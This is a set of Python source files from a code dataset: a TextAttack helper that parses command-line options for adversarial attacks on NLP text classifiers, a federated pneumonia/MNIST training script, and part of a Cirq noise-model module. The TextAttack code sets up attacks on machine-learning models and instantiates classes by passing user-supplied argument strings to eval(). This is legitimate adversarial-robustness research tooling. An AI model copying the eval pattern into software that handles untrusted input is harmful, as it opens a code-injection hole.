formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n parser.add_argument('--transformation', type=str, required=False,\n default='word-swap-embedding', choices=TRANSFORMATION_CLASS_NAMES.keys(),\n help='The transformations to apply.')\n\n parser.add_argument('--model', type=str, required=False, default='bert-yelp-sentiment',\n choices=MODEL_CLASS_NAMES.keys(), help='The classification model to attack.')\n \n parser.add_argument('--constraints', type=str, required=False, nargs='*',\n default=['repeat', 'stopword'],\n help=('Constraints to add to the attack. Usage: \"--constraints {constraint}:{arg_1}={value_1},{arg_3}={value_3}\". Choices: ' + str(CONSTRAINT_CLASS_NAMES.keys())))\n \n parser.add_argument('--out-dir', type=str, required=False, default=None,\n help='A directory to output results to.')\n \n parser.add_argument('--enable-visdom', action='store_true',\n help='Enable logging to visdom.')\n \n parser.add_argument('--enable-wandb', action='store_true',\n help='Enable logging to Weights & Biases.')\n \n parser.add_argument('--disable-stdout', action='store_true',\n help='Disable logging to stdout')\n \n parser.add_argument('--enable-csv', nargs='?', default=None, const='fancy', type=str,\n help='Enable logging to csv. 
Use --enable-csv plain to remove [[]] around words.')\n\n parser.add_argument('--num-examples', '-n', type=int, required=False, \n default='5', help='The number of examples to process.')\n \n parser.add_argument('--num-examples-offset', '-o', type=int, required=False, \n default=0, help='The offset to start at in the dataset.')\n\n parser.add_argument('--shuffle', action='store_true', required=False, \n default=False, help='Randomly shuffle the data before attacking')\n \n parser.add_argument('--interactive', action='store_true', default=False,\n help='Whether to run attacks interactively.')\n \n parser.add_argument('--attack-n', action='store_true', default=False,\n help='Whether to run attack until `n` examples have been attacked (not skipped).')\n \n parser.add_argument('--parallel', action='store_true', default=False,\n help='Run attack using multiple GPUs.')\n\n goal_function_choices = ', '.join(GOAL_FUNCTION_CLASS_NAMES.keys())\n parser.add_argument('--goal-function', '-g', default='untargeted-classification',\n help=f'The goal function to use. choices: {goal_function_choices}')\n \n def str_to_int(s): return sum((ord(c) for c in s))\n parser.add_argument('--random-seed', default=str_to_int('TEXTATTACK'))\n\n parser.add_argument('--checkpoint-dir', required=False, type=str, default=default_checkpoint_dir(),\n help='A directory to save/load checkpoint files.')\n\n parser.add_argument('--checkpoint-interval', required=False, type=int, \n help='Interval for saving checkpoints. If not set, no checkpoints will be saved.')\n \n attack_group = parser.add_mutually_exclusive_group(required=False)\n \n search_choices = ', '.join(SEARCH_CLASS_NAMES.keys())\n attack_group.add_argument('--search', '-s', '--search-method', type=str, \n required=False, default='greedy-word-wir', \n help=f'The search method to use. choices: {search_choices}')\n \n attack_group.add_argument('--recipe', '-r', type=str, required=False, default=None,\n help='full attack recipe (overrides provided goal function, transformation & constraints)',\n choices=RECIPE_NAMES.keys())\n\n # Parser for parsing args for resume\n resume_parser = argparse.ArgumentParser(\n description='A commandline parser for TextAttack', \n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n resume_parser.add_argument('--checkpoint-file', '-f', type=str, required=False, default='latest', \n help='Name of checkpoint file to resume attack from. If \"latest\" is entered, recover latest checkpoint.')\n\n resume_parser.add_argument('--checkpoint-dir', '-d', required=False, type=str, default=default_checkpoint_dir(),\n help='A directory to save/load checkpoint files.')\n\n resume_parser.add_argument('--checkpoint-interval', '-i', required=False, type=int, \n help='Interval for saving checkpoints. 
If not set, no checkpoints will be saved.')\n\n resume_parser.add_argument('--parallel', action='store_true', default=False,\n help='Run attack using multiple GPUs.')\n\n if sys.argv[1:] and sys.argv[1].lower() == 'resume':\n args = resume_parser.parse_args(sys.argv[2:])\n setattr(args, 'checkpoint_resume', True)\n else:\n command_line_args = None if sys.argv[1:] else ['-h'] # Default to help with empty arguments.\n args = parser.parse_args(command_line_args)\n setattr(args, 'checkpoint_resume', False)\n\n if args.checkpoint_interval and args.shuffle:\n # Not allowed b/c we cannot recover order of shuffled data\n raise ValueError('Cannot use `--checkpoint-interval` with `--shuffle=True`')\n \n set_seed(args.random_seed)\n \n return args\n\ndef parse_transformation_from_args(args):\n # Transformations\n transformation = args.transformation\n if ':' in transformation:\n transformation_name, params = transformation.split(':')\n if transformation_name not in TRANSFORMATION_CLASS_NAMES:\n raise ValueError(f'Error: unsupported transformation {transformation_name}')\n transformation = eval(f'{TRANSFORMATION_CLASS_NAMES[transformation_name]}({params})')\n elif transformation in TRANSFORMATION_CLASS_NAMES:\n transformation = eval(f'{TRANSFORMATION_CLASS_NAMES[transformation]}()')\n else:\n raise ValueError(f'Error: unsupported transformation {transformation}')\n return transformation\n\ndef parse_goal_function_from_args(args, model):\n # Goal Functions\n goal_function = args.goal_function\n if ':' in goal_function:\n goal_function_name, params = goal_function.split(':')\n if goal_function_name not in GOAL_FUNCTION_CLASS_NAMES:\n raise ValueError(f'Error: unsupported goal_function {goal_function_name}')\n goal_function = eval(f'{GOAL_FUNCTION_CLASS_NAMES[goal_function_name]}(model, {params})')\n elif goal_function in GOAL_FUNCTION_CLASS_NAMES:\n goal_function = eval(f'{GOAL_FUNCTION_CLASS_NAMES[goal_function]}(model)')\n else:\n raise ValueError(f'Error: unsupported goal_function {goal_function}')\n return goal_function\n\ndef parse_constraints_from_args(args):\n # Constraints\n if not args.constraints: \n return []\n \n _constraints = []\n for constraint in args.constraints:\n if ':' in constraint:\n constraint_name, params = constraint.split(':')\n if constraint_name not in CONSTRAINT_CLASS_NAMES:\n raise ValueError(f'Error: unsupported constraint {constraint_name}')\n _constraints.append(eval(f'{CONSTRAINT_CLASS_NAMES[constraint_name]}({params})'))\n elif constraint in CONSTRAINT_CLASS_NAMES:\n _constraints.append(eval(f'{CONSTRAINT_CLASS_NAMES[constraint]}()'))\n else:\n raise ValueError(f'Error: unsupported constraint {constraint}')\n \n return _constraints\n\ndef parse_recipe_from_args(model, args):\n if ':' in args.recipe:\n recipe_name, params = args.recipe.split(':')\n if recipe_name not in RECIPE_NAMES:\n raise ValueError(f'Error: unsupported recipe {recipe_name}')\n recipe = eval(f'{RECIPE_NAMES[recipe_name]}(model, {params})')\n elif args.recipe in RECIPE_NAMES:\n recipe = eval(f'{RECIPE_NAMES[args.recipe]}(model)')\n else:\n raise ValueError(f'Invalid recipe {args.recipe}')\n return recipe\n\n
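parse_recipe_from_args above follows the same pattern as every other parse_* helper in this file: look the name up in a registry dict of fully qualified class names, then eval an f-string to instantiate it, optionally splicing ':'-separated keyword arguments into the call. A minimal sketch of that pattern with a stand-in registry (FakeSearch and 'beam-search' here are illustrative, not TextAttack classes):

class FakeSearch:
    def __init__(self, beam_width=1):
        self.beam_width = beam_width

REGISTRY = {'beam-search': 'FakeSearch'}

def parse_from_spec(spec):
    # 'name:arg=value,...' instantiates with keyword arguments, bare 'name' without.
    if ':' in spec:
        name, params = spec.split(':')
        return eval(f'{REGISTRY[name]}({params})')
    return eval(f'{REGISTRY[spec]}()')

assert parse_from_spec('beam-search:beam_width=8').beam_width == 8

Eval keeps the registries declarative, at the cost that a malformed parameter string surfaces as a SyntaxError rather than a friendlier parser error.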
def parse_goal_function_and_attack_from_args(args):\n if ':' in args.model:\n model_name, params = args.model.split(':')\n if model_name not in MODEL_CLASS_NAMES:\n raise ValueError(f'Error: unsupported model {model_name}')\n model = eval(f'{MODEL_CLASS_NAMES[model_name]}({params})')\n elif args.model in MODEL_CLASS_NAMES:\n model = eval(f'{MODEL_CLASS_NAMES[args.model]}()')\n else: \n raise ValueError(f'Error: unsupported model {args.model}')\n if args.recipe:\n attack = parse_recipe_from_args(model, args)\n goal_function = attack.goal_function\n return goal_function, attack\n else:\n goal_function = parse_goal_function_from_args(args, model)\n transformation = parse_transformation_from_args(args)\n constraints = parse_constraints_from_args(args)\n if ':' in args.search:\n search_name, params = args.search.split(':')\n if search_name not in SEARCH_CLASS_NAMES:\n raise ValueError(f'Error: unsupported search {search_name}')\n search_method = eval(f'{SEARCH_CLASS_NAMES[search_name]}({params})')\n elif args.search in SEARCH_CLASS_NAMES:\n search_method = eval(f'{SEARCH_CLASS_NAMES[args.search]}()')\n else:\n raise ValueError(f'Error: unsupported attack {args.search}')\n return goal_function, textattack.shared.Attack(goal_function, constraints, transformation, search_method)\n\ndef parse_logger_from_args(args):\n # Create logger\n attack_log_manager = textattack.loggers.AttackLogManager()\n # Set default output directory to `textattack/outputs`.\n if not args.out_dir:\n current_dir = os.path.dirname(os.path.realpath(__file__))\n outputs_dir = os.path.join(current_dir, os.pardir, os.pardir, os.pardir, 'outputs')\n args.out_dir = os.path.normpath(outputs_dir)\n \n # Output file.\n out_time = int(time.time()*1000) # Output file\n outfile_name = 'attack-{}.txt'.format(out_time)\n attack_log_manager.add_output_file(os.path.join(args.out_dir, outfile_name))\n \n # CSV\n if args.enable_csv:\n outfile_name = 'attack-{}.csv'.format(out_time)\n color_method = None if args.enable_csv == 'plain' else 'file'\n csv_path = os.path.join(args.out_dir, outfile_name)\n attack_log_manager.add_output_csv(csv_path, color_method)\n print('Logging to CSV at path {}.'.format(csv_path))\n\n # Visdom\n if args.enable_visdom:\n attack_log_manager.enable_visdom()\n \n # Weights & Biases\n if args.enable_wandb:\n attack_log_manager.enable_wandb()\n\n # Stdout\n if not args.disable_stdout:\n attack_log_manager.enable_stdout()\n return attack_log_manager\n\ndef parse_checkpoint_from_args(args):\n if args.checkpoint_file.lower() == 'latest':\n chkpt_file_names = [f for f in os.listdir(args.checkpoint_dir) if f.endswith('.ta.chkpt')]\n assert chkpt_file_names, \"Checkpoint directory is empty\"\n timestamps = [int(f.replace('.ta.chkpt', '')) for f in chkpt_file_names]\n latest_file = str(max(timestamps)) + '.ta.chkpt'\n checkpoint_path = os.path.join(args.checkpoint_dir, latest_file)\n else:\n checkpoint_path = os.path.join(args.checkpoint_dir, args.checkpoint_file)\n \n checkpoint = textattack.shared.Checkpoint.load(checkpoint_path)\n set_seed(checkpoint.args.random_seed)\n\n return checkpoint\n\ndef default_checkpoint_dir():\n current_dir = os.path.dirname(os.path.realpath(__file__))\n checkpoints_dir = os.path.join(current_dir, os.pardir, os.pardir, os.pardir, 'checkpoints')\n return os.path.normpath(checkpoints_dir)\n\ndef merge_checkpoint_args(saved_args, cmdline_args):\n \"\"\" Merge previously saved arguments for checkpoint and newly entered arguments \"\"\"\n args = copy.deepcopy(saved_args)\n # Newly entered arguments take precedence\n args.checkpoint_resume = cmdline_args.checkpoint_resume\n args.parallel = cmdline_args.parallel\n args.checkpoint_dir = cmdline_args.checkpoint_dir\n # If set, we replace\n if cmdline_args.checkpoint_interval:\n args.checkpoint_interval = cmdline_args.checkpoint_interval\n \n return args\n","sub_path":"textattack/shared/scripts/run_attack_args_helper.py","file_name":"run_attack_args_helper.py","file_ext":"py","file_size_in_byte":19334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
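parse_checkpoint_from_args in the record above resolves the special name 'latest' by exploiting the file-name convention: checkpoints are named with a millisecond timestamp plus a '.ta.chkpt' suffix, so the newest one is simply the numeric maximum. A standalone sketch of just that lookup (the directory argument is illustrative):

import os

def latest_checkpoint(checkpoint_dir):
    # Collect checkpoint files, then pick the largest embedded timestamp.
    names = [f for f in os.listdir(checkpoint_dir) if f.endswith('.ta.chkpt')]
    assert names, 'Checkpoint directory is empty'
    timestamps = [int(f.replace('.ta.chkpt', '')) for f in names]
    return os.path.join(checkpoint_dir, str(max(timestamps)) + '.ta.chkpt')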
args\n","sub_path":"textattack/shared/scripts/run_attack_args_helper.py","file_name":"run_attack_args_helper.py","file_ext":"py","file_size_in_byte":19334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"264421796","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport configparser\nimport argparse\nimport visdom\nimport tqdm\nimport shutil\nimport random\nimport numpy as np\nfrom os import path, remove\nfrom warnings import warn\nfrom datetime import datetime\nfrom tabulate import tabulate\nfrom torchvision import datasets, transforms, models\nfrom torchlib.dataloader import PPPP\nfrom torchlib.models import vgg16, resnet18, conv_at_resolution\nfrom torchlib.utils import (\n LearningRateScheduler,\n Arguments,\n train,\n test,\n save_model,\n save_config_results,\n AddGaussianNoise,\n)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"--config\",\n type=str,\n required=True,\n default=\"configs/pneumonia.ini\",\n help=\"Path to config\",\n )\n parser.add_argument(\n \"--train_federated\", action=\"store_true\", help=\"Train in federated setting\"\n )\n parser.add_argument(\n \"--dataset\",\n type=str,\n default=\"pneumonia\",\n choices=[\"pneumonia\", \"mnist\"],\n help=\"which dataset?\",\n )\n parser.add_argument(\n \"--no_visdom\", action=\"store_false\", help=\"dont use a visdom server\"\n )\n parser.add_argument(\n \"--no_cuda\", action=\"store_true\", help=\"dont use a visdom server\"\n )\n parser.add_argument(\n \"--resume_checkpoint\",\n type=str,\n default=None,\n help=\"Start training from older model checkpoint\",\n )\n parser.add_argument(\n \"--websockets\",\n action=\"store_true\",\n help=\"Use websockets instead of virtual workers\",\n )\n cmd_args = parser.parse_args()\n\n config = configparser.ConfigParser()\n assert path.isfile(cmd_args.config), \"config file not found\"\n config.read(cmd_args.config)\n\n args = Arguments(cmd_args, config, mode=\"train\")\n\n if args.train_federated:\n import syft as sy\n from torchlib.websocket_utils import read_websocket_config\n\n hook = sy.TorchHook(torch)\n worker_dict = read_websocket_config(\"configs/websetting/config.csv\")\n worker_names = [id_dict[\"id\"] for _, id_dict in worker_dict.items()]\n if cmd_args.websockets:\n kwargs_websocket = {\n \"hook\": hook,\n \"verbose\": False,\n }\n workers = [\n sy.WebsocketClientWorker(\n id=id_dict[\"id\"],\n port=id_dict[\"port\"],\n host=id_dict[\"host\"],\n **kwargs_websocket,\n )\n for row, id_dict in worker_dict.items()\n ]\n\n else:\n workers = [\n sy.VirtualWorker(hook, id=id_dict[\"id\"])\n for row, id_dict in worker_dict.items()\n ]\n\n use_cuda = not args.no_cuda and torch.cuda.is_available()\n\n torch.manual_seed(args.seed)\n random.seed(args.seed)\n np.random.seed(args.seed)\n torch.backends.cudnn.deterministic = True\n torch.backends.cudnn.benchmark = False\n\n device = torch.device(\"cuda\" if use_cuda else \"cpu\") # pylint: disable=no-member\n\n kwargs = {\"num_workers\": 1, \"pin_memory\": True} if use_cuda else {}\n\n timestamp = datetime.now().strftime(\"%Y-%m-%d_%H-%M\")\n exp_name = \"{:s}_{:s}_{:s}\".format(\n \"federated\" if args.train_federated else \"vanilla\", args.dataset, timestamp\n )\n\n \"\"\"\n Dataset creation and definition\n \"\"\"\n class_names = None\n if args.dataset == \"mnist\":\n num_classes = 10\n train_tf = [\n transforms.Resize(args.train_resolution),\n transforms.ToTensor(),\n 
transforms.Normalize((0.1307,), (0.3081,)),\n ]\n test_tf = [\n transforms.Resize(args.inference_resolution),\n transforms.ToTensor(),\n transforms.Normalize((0.1307,), (0.3081,)),\n ]\n if args.pretrained:\n repeat = transforms.Lambda(\n lambda x: torch.repeat_interleave( # pylint: disable=no-member\n x, 3, dim=0\n )\n )\n train_tf.append(repeat)\n test_tf.append(repeat)\n dataset = datasets.MNIST(\n \"../data\",\n train=True,\n download=True,\n transform=transforms.Compose(train_tf),\n )\n\n testset = datasets.MNIST(\n \"../data\", train=False, transform=transforms.Compose(test_tf),\n )\n elif args.dataset == \"pneumonia\":\n num_classes = 3\n \"\"\"\n Different train and inference resolution only works with adaptive\n pooling in model activated\n \"\"\"\n train_tf = [\n transforms.RandomVerticalFlip(p=args.vertical_flip_prob),\n transforms.RandomAffine(\n degrees=args.rotation,\n translate=(args.translate, args.translate),\n scale=(1.0 - args.scale, 1.0 + args.scale),\n shear=args.shear,\n fillcolor=0.0,\n ),\n transforms.Resize(args.inference_resolution),\n transforms.RandomCrop(args.train_resolution),\n transforms.ToTensor(),\n transforms.Normalize((0.57282609,), (0.17427578,)),\n transforms.RandomApply(\n [AddGaussianNoise(mean=0.0, std=args.noise_std)], p=args.noise_prob\n ),\n ]\n # TODO: Add normalization\n test_tf = [\n transforms.Resize(args.inference_resolution),\n transforms.CenterCrop(args.inference_resolution),\n transforms.ToTensor(),\n transforms.Normalize((0.57282609,), (0.17427578,)),\n ]\n\n \"\"\"\n Duplicate grayscale one channel image into 3 channels\n \"\"\"\n if args.pretrained:\n repeat = transforms.Lambda(\n lambda x: torch.repeat_interleave( # pylint: disable=no-member\n x, 3, dim=0\n )\n )\n train_tf.append(repeat)\n test_tf.append(repeat)\n dataset = PPPP(\n \"data/Labels.csv\",\n train=True,\n transform=transforms.Compose(train_tf),\n seed=args.seed,\n )\n \"\"\" Removed because bad practice\n testset = PPPP(\n \"data/Labels.csv\",\n train=False,\n transform=transforms.Compose(test_tf),\n seed=args.seed,\n )\"\"\"\n class_names = {0: \"normal\", 1: \"bacterial pneumonia\", 2: \"viral pneumonia\"}\n occurances = dataset.get_class_occurances()\n else:\n raise NotImplementedError(\"dataset not implemented\")\n\n total_L = len(dataset)\n fraction = 1.0 / args.val_split\n dataset, valset = torch.utils.data.random_split(\n dataset,\n [int(round(total_L * (1.0 - fraction))), int(round(total_L * fraction))],\n )\n del total_L, fraction\n\n if args.train_federated:\n train_loader = sy.FederatedDataLoader(\n dataset.federate(tuple(workers)),\n batch_size=args.batch_size,\n shuffle=True,\n **kwargs,\n )\n \"\"\"val_loader = sy.FederatedDataLoader(\n valset.federate((bob, alice, charlie)),\n batch_size=args.test_batch_size,\n shuffle=True,\n **kwargs\n )\"\"\"\n else:\n train_loader = torch.utils.data.DataLoader(\n dataset, batch_size=args.batch_size, shuffle=True, **kwargs\n )\n val_loader = torch.utils.data.DataLoader(\n valset, batch_size=args.test_batch_size, shuffle=False, **kwargs\n )\n\n \"\"\" Removed because bad practice\n test_loader = torch.utils.data.DataLoader(\n testset, batch_size=args.test_batch_size, shuffle=True, **kwargs\n )\"\"\"\n cw = None\n if args.class_weights:\n if not occurances:\n occurances = {}\n # if hasattr(dataset, \"get_class_occurances\"):\n # occurances = dataset.get_class_occurances()\n # else:\n for _, c in tqdm.tqdm(\n dataset, total=len(dataset), leave=False, desc=\"calc class weights\"\n ):\n if c.item() in occurances:\n 
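A quick sanity check of the grayscale-to-3-channel trick used in the transform lists above (a sketch, shapes only):

import torch

x = torch.zeros(1, 28, 28)                # single-channel image tensor
y = torch.repeat_interleave(x, 3, dim=0)  # duplicate the channel three times
assert y.shape == (3, 28, 28)             # now accepted by pretrained RGB models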
occurances[c] += 1\n else:\n occurances[c] = 1\n cw = torch.zeros((len(occurances))) # pylint: disable=no-member\n for c, n in occurances.items():\n cw[c] = 1.0 / float(n)\n cw /= torch.sum(cw) # pylint: disable=no-member\n cw = cw.to(device)\n\n scheduler = LearningRateScheduler(\n args.epochs, np.log10(args.lr), np.log10(args.end_lr), restarts=args.restarts\n )\n\n ## visdom\n vis_params = None\n if args.visdom:\n vis = visdom.Visdom()\n assert vis.check_connection(\n timeout_seconds=3\n ), \"No connection could be formed quickly\"\n vis_env = path.join(\n args.dataset, \"federated\" if args.train_federated else \"vanilla\", timestamp\n )\n plt_dict = dict(\n name=\"training loss\",\n ytickmax=10,\n xlabel=\"epoch\",\n ylabel=\"loss\",\n legend=[\"train_loss\"],\n )\n vis.line(\n X=np.zeros((1, 3)),\n Y=np.zeros((1, 3)),\n win=\"loss_win\",\n opts={\n \"legend\": [\"train_loss\", \"val_loss\", \"accuracy\"],\n \"xlabel\": \"epochs\",\n \"ylabel\": \"loss / accuracy [%]\",\n },\n env=vis_env,\n )\n vis.line(\n X=np.zeros((1, 1)),\n Y=np.zeros((1, 1)),\n win=\"lr_win\",\n opts={\"legend\": [\"learning_rate\"], \"xlabel\": \"epochs\", \"ylabel\": \"lr\"},\n env=vis_env,\n )\n vis_params = {\"vis\": vis, \"vis_env\": vis_env}\n # model = Net().to(device)\n if args.model == \"vgg16\":\n model = vgg16(\n pretrained=args.pretrained,\n num_classes=num_classes,\n in_channels=3 if args.pretrained else 1,\n adptpool=False,\n input_size=args.inference_resolution,\n )\n elif args.model == \"simpleconv\":\n if args.pretrained:\n warn(\"No pretrained version available\")\n model = conv_at_resolution[args.train_resolution](\n num_classes=num_classes, in_channels=3 if args.pretrained else 1\n )\n elif args.model == \"resnet-18\":\n model = resnet18(\n pretrained=args.pretrained,\n num_classes=num_classes,\n in_channels=3 if args.pretrained else 1,\n adptpool=False,\n input_size=args.inference_resolution,\n )\n else:\n raise NotImplementedError(\"model unknown\")\n # model = resnet18(pretrained=False, num_classes=num_classes, in_channels=1)\n # model = models.vgg16(pretrained=False, num_classes=3)\n # model.classifier = vggclassifier()\n if args.optimizer == \"SGD\":\n optimizer = optim.SGD(\n model.parameters(), lr=args.lr, weight_decay=args.weight_decay,\n ) # TODO momentum is not supported at the moment\n elif args.optimizer == \"Adam\":\n optimizer = optim.Adam(\n model.parameters(),\n lr=args.lr,\n betas=(args.beta1, args.beta2),\n weight_decay=args.weight_decay,\n )\n else:\n raise NotImplementedError(\"optimization not implemented\")\n if args.train_federated:\n from syft.federated.floptimizer import Optims\n\n optimizer = Optims(worker_names, optimizer)\n loss_fn = nn.CrossEntropyLoss(weight=cw, reduction=\"mean\")\n\n start_at_epoch = 1\n if cmd_args.resume_checkpoint:\n print(\"resuming checkpoint - args will be overwritten\")\n state = torch.load(cmd_args.resume_checkpoint, map_location=device)\n start_at_epoch = state[\"epoch\"]\n args = state[\"args\"]\n if args.train_federated:\n opt_state_dict = state[\"optim_state_dict\"]\n for w in worker_names:\n optimizer.get_optim(w).load_state_dict(opt_state_dict[w])\n else:\n optimizer.load_state_dict(state[\"optim_state_dict\"])\n model.load_state_dict(state[\"model_state_dict\"])\n model.to(device)\n\n test(\n args,\n model,\n device,\n val_loader,\n start_at_epoch - 1,\n loss_fn,\n num_classes,\n vis_params=vis_params,\n class_names=class_names,\n )\n accuracies = []\n model_paths = []\n for epoch in range(start_at_epoch, args.epochs + 1):\n if 
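A worked example of the inverse-frequency class weights computed above, assuming hypothetical class counts:

import torch

occurances = {0: 10, 1: 30, 2: 60}  # hypothetical counts per class
cw = torch.zeros(len(occurances))
for c, n in occurances.items():
    cw[c] = 1.0 / float(n)
cw /= torch.sum(cw)                  # -> tensor([0.6667, 0.2222, 0.1111]): rare classes weigh more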
args.train_federated:\n for w in worker_names:\n new_lr = scheduler.adjust_learning_rate(\n optimizer.get_optim(w), epoch - 1\n )\n else:\n new_lr = scheduler.adjust_learning_rate(optimizer, epoch - 1)\n if args.visdom:\n vis.line(\n X=np.asarray([epoch - 1]),\n Y=np.asarray([new_lr]),\n win=\"lr_win\",\n name=\"learning_rate\",\n update=\"append\",\n env=vis_env,\n )\n train(\n args,\n model,\n device,\n train_loader,\n optimizer,\n epoch,\n loss_fn,\n vis_params=vis_params,\n )\n if (epoch % args.test_interval) == 0:\n _, acc = test(\n args,\n model,\n device,\n val_loader,\n epoch,\n loss_fn,\n num_classes=num_classes,\n vis_params=vis_params,\n class_names=class_names,\n )\n model_path = \"model_weights/{:s}_epoch_{:03d}.pt\".format(exp_name, epoch,)\n\n save_model(model, optimizer, model_path, args, epoch)\n accuracies.append(acc)\n model_paths.append(model_path)\n # reversal and formula because we want last occurance of highest value\n accuracies = np.array(accuracies)[::-1]\n am = np.argmax(accuracies)\n highest_acc = len(accuracies) - am - 1\n best_epoch = highest_acc * args.test_interval\n best_model_file = model_paths[highest_acc]\n print(\n \"Highest accuracy was {:.1f}% in epoch {:d}\".format(accuracies[am], best_epoch)\n )\n # load best model on val set\n state = torch.load(best_model_file, map_location=device)\n model.load_state_dict(state[\"model_state_dict\"])\n\n \"\"\"_, result = test(\n args,\n model,\n device,\n val_loader,\n args.epochs + 1,\n loss_fn,\n num_classes=num_classes,\n vis_params=vis_params,\n class_names=class_names,\n )\n print('result: {:.1f} - best accuracy: {:.1f}'.format(result, accuracies[am]))\"\"\"\n shutil.copyfile(\n best_model_file, \"model_weights/final_{:s}.pt\".format(exp_name),\n )\n save_config_results(\n args, accuracies[am], timestamp, \"model_weights/completed_trainings.csv\"\n )\n\n # delete old model weights\n for model_file in model_paths:\n remove(model_file)\n \"\"\"save_model(\n model,\n optimizer,\n \"model_weights/{:s}_{:s}_final.pt\".format(\n \"federated\" if args.train_federated else \"vanilla\", args.dataset\n ),\n )\"\"\"\n","sub_path":"train_federated.py","file_name":"train_federated.py","file_ext":"py","file_size_in_byte":15192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"504540298","text":"# Copyright 2019 The Cirq Developers\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# https://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom typing import Dict, Sequence, TYPE_CHECKING\n\nfrom cirq import devices, value, ops, protocols\n\nfrom cirq.google import engine\n\nif TYPE_CHECKING:\n import cirq\n\n\ndef _homogeneous_moment_is_measurements(moment: 'cirq.Moment') -> bool:\n \"\"\"Whether the moment is nothing but measurement gates.\n\n If a moment is a mixture of measurement and non-measurement gates\n this will throw a ValueError.\n \"\"\"\n cases = {protocols.is_measurement(gate) for gate in moment}\n if len(cases) == 2:\n raise ValueError(\"Moment must be homogeneous: all measurements \"\n \"or all 
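A small check of the reversal-plus-argmax trick used above to pick the last occurrence of the best accuracy (np.argmax alone returns the first occurrence):

import numpy as np

accs = [90.0, 95.0, 95.0, 92.0]
rev = np.array(accs)[::-1]
am = np.argmax(rev)                  # first max of the reversed array
last_best = len(accs) - am - 1
assert last_best == 2                # the later of the two 95.0 entries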
operations.\")\n return True in cases\n\n\nclass DepolarizingNoiseModel(devices.NoiseModel):\n \"\"\"Applies depolarizing noise to each qubit individually at the end of\n every moment.\n\n If a circuit contains measurements, they must be in moments that don't\n also contain gates.\n \"\"\"\n\n def __init__(self, depol_prob: float):\n \"\"\"A depolarizing noise model\n\n Args:\n depol_prob: Depolarizing probability.\n \"\"\"\n value.validate_probability(depol_prob, 'depol prob')\n self.qubit_noise_gate = ops.DepolarizingChannel(depol_prob)\n\n def noisy_moment(self, moment: 'cirq.Moment',\n system_qubits: Sequence['cirq.Qid']):\n if (_homogeneous_moment_is_measurements(moment) or\n self.is_virtual_moment(moment)):\n # coverage: ignore\n return moment\n\n return [\n moment,\n ops.Moment(\n self.qubit_noise_gate(q).with_tags(ops.VirtualTag())\n for q in system_qubits)\n ]\n\n\nclass ReadoutNoiseModel(devices.NoiseModel):\n \"\"\"NoiseModel with probabilistic bit flips preceding measurement.\n\n This simulates readout error. Note that since noise is applied before the\n measurement moment, composing this model on top of another noise model will\n place the bit flips immediately before the measurement (regardless of the\n previously-added noise).\n\n If a circuit contains measurements, they must be in moments that don't\n also contain gates.\n \"\"\"\n\n def __init__(self, bitflip_prob: float):\n \"\"\"A noise model with readout error.\n\n Args:\n bitflip_prob: Probability of a bit-flip during measurement.\n \"\"\"\n value.validate_probability(bitflip_prob, 'bitflip prob')\n self.readout_noise_gate = ops.BitFlipChannel(bitflip_prob)\n\n def noisy_moment(self, moment: 'cirq.Moment',\n system_qubits: Sequence['cirq.Qid']):\n if self.is_virtual_moment(moment):\n return moment\n if _homogeneous_moment_is_measurements(moment):\n return [\n ops.Moment(\n self.readout_noise_gate(q).with_tags(ops.VirtualTag())\n for q in system_qubits), moment\n ]\n return moment\n\n\nclass DampedReadoutNoiseModel(devices.NoiseModel):\n \"\"\"NoiseModel with T1 decay preceding measurement.\n\n This simulates asymmetric readout error. 
Note that since noise is applied\n before the measurement moment, composing this model on top of another noise\n model will place the T1 decay immediately before the measurement\n (regardless of the previously-added noise).\n\n If a circuit contains measurements, they must be in moments that don't\n also contain gates.\n \"\"\"\n\n def __init__(self, decay_prob: float):\n \"\"\"A depolarizing noise model with damped readout error.\n\n Args:\n decay_prob: Probability of T1 decay during measurement.\n \"\"\"\n value.validate_probability(decay_prob, 'decay_prob')\n self.readout_decay_gate = ops.AmplitudeDampingChannel(decay_prob)\n\n def noisy_moment(self, moment: 'cirq.Moment',\n system_qubits: Sequence['cirq.Qid']):\n if self.is_virtual_moment(moment):\n return moment\n if _homogeneous_moment_is_measurements(moment):\n return [\n ops.Moment(\n self.readout_decay_gate(q).with_tags(ops.VirtualTag())\n for q in system_qubits), moment\n ]\n return moment\n\n\nclass DepolarizingWithReadoutNoiseModel(devices.NoiseModel):\n \"\"\"DepolarizingNoiseModel with probabilistic bit flips preceding\n measurement.\n This simulates readout error.\n If a circuit contains measurements, they must be in moments that don't\n also contain gates.\n \"\"\"\n\n def __init__(self, depol_prob: float, bitflip_prob: float):\n \"\"\"A depolarizing noise model with readout error.\n Args:\n depol_prob: Depolarizing probability.\n bitflip_prob: Probability of a bit-flip during measurement.\n \"\"\"\n value.validate_probability(depol_prob, 'depol prob')\n value.validate_probability(bitflip_prob, 'bitflip prob')\n self.qubit_noise_gate = ops.DepolarizingChannel(depol_prob)\n self.readout_noise_gate = ops.BitFlipChannel(bitflip_prob)\n\n def noisy_moment(self, moment: 'cirq.Moment',\n system_qubits: Sequence['cirq.Qid']):\n if _homogeneous_moment_is_measurements(moment):\n return [\n ops.Moment(self.readout_noise_gate(q) for q in system_qubits),\n moment,\n ]\n return [\n moment,\n ops.Moment(self.qubit_noise_gate(q) for q in system_qubits),\n ]\n\n\nclass DepolarizingWithDampedReadoutNoiseModel(devices.NoiseModel):\n \"\"\"DepolarizingWithReadoutNoiseModel with T1 decay preceding\n measurement.\n This simulates asymmetric readout error. 
